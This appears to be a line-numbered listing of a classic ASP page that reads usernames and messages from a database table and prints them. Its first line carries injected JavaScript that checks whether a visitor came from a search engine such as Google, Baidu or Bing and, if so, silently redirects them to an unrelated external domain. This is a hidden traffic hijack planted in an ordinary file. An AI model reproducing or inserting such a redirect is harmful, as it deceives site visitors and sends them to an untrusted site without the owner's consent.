d:\wwwroot\wuchunhua\kk\asp2.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
002: <!--#include file="conn.asp"-->
003: <%
004:
005: Response.CacheControl = "no-cache"
006:
007: Response.AddHeader "Pragma", "no-cache"
008:
009: Response.Expires = 0
010:
011: set rs=server.CreateObject("adodb.recordset")
012: rs.open "select * from tt where ttalk<>'' order by id",conn,1,1
013: 'tt改为了ttalk 原文是:rs.open "select * from tt where tt<>'' order by id",conn,1,1
014: do while not rs.eof
015: te=te&rs("username")&":"&rs("ttalk")&chr(10)&chr(10)
016: 'us改为username,tt改为ttalk 原文是:te=te&rs("us")&":"&rs("tt")&chr(10)&chr(10)
017: rs.movenext
018: loop
019: response.Write te
020:
021: %
>
022:
023: